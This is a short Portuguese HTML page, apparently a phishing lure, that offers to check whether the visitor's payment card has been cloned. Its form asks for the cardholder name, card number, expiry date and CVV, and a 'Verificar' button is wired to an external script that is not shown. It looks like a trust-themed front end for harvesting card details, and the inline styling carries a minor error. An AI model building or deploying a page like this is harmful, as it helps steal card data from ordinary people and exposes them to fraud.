<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>testew</title>
    <link rel="stylesheet" href="site.css">
    <style>
        * {
            font-family: Arial, Helvetica, sans-serif;
            box-sizing: border-box;
        }

        body {
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
            margin: 0;
            background-color: #868585; /* Cor de fundo opcional */
        }

        .dados {
            text-align: center;
            border-radius: 12px;
            background-color: rgb(41, 39, 39);
            color: white;
            padding: 20px;
            display: grid;
            width: 30%;
            box-shadow: 0 0 15px rgba(0, 0, 0, 0.9);
        }

        .imagem {
            width: 15%;
        }

        .dados input{
           margin-bottom: 10px;
        }

        input{
            display: grid;
            margin-left: 100px;
        }

        #imgcard{
            width: 20%;
            margin-left: 130px;
            margin-top: -25px;
            margin-bottom: 20px;
        }

        .dados:hover{
            transition: transform 1s ease;
            transform: scale(1.2);

        }

        .dados p{
            letter-spacing: 2px;
            margin-top: -20px;
            opacity: 0.7;
        }

        #btn{
            width: 50%;
            margin-left: 90px;
            margin-top: 10px;
            margin-bottom: 10px;
            background-color: green;
            border: none;
            border-radius: 5px;
            padding: 7px;
            font-size: ;
        }

        #btn:hover{
            transition: transform 0.5s ease;
            transform: scale(1.1);
        }
    </style>
</head>
<body>
    <div class="dados">
        <img class="imagem" src="./site-seguro.webp" alt="">
        <h1>Verificar agora:</h1>
        <p>saiba se seu cartão foi clonado.</p>
        <img id="imgcard" src="./images-removebg-preview.png" alt="">
        <label>Nome no cartão:
            <input type="text">
        </label>
        <label>Número:
            <input id="numeroC" type="number">
        </label>
        <label>Data de Validade:
            <input type="text">
        </label>
        <label>CVV:
            <input type="text">
        </label>

        <button id="btn">Verificar</button>
    </div>

    <script src="script.js"></script>
</body>
</html>
